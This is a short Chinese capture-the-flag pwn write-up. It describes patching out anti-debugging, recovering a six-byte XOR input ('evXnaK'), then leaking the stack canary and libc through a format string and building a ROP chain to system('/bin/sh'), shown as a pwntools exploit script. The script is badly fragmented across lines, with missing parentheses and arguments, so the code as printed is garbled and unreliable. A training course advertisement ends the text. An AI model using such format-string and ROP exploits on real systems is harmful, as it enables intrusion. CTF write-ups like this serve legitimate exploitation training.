先patch掉反调,然后单步跟进,发现读入六个字节,然后拿去做异或,修改后面的代码。
待修改的代码会出现连续三个一样的字符,猜测应该是00,于是得到输入为evXnaK。
evXnaK
之后出现一次printf和简单栈溢出,于是先泄漏canary和libc,然后ROP。
def
exploit(r):
r.clean()
r.send(
'\x65\x76\x58\x6e\x61\x4b'
)
'%13$p@%15$p'
.ljust(
26
,
'#'
))
tmp
=
r.recvuntil(
'###'
, drop
True
tmp.split(
'@'
canary
int
(tmp[
0
],
16
libc.address
1
-
libc.sym[
'__libc_start_main'
]
240
info(canary)
info(
'%016x libc.address'
, libc.address)
raw_input
(
r.send(flat(
'a'
*
88
, canary,
0x400b23
, libc.search(
'/bin/sh'
).
next
(), libc.sym[
'system'
]).ljust(
0x200
'\x00'
r.interactive()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
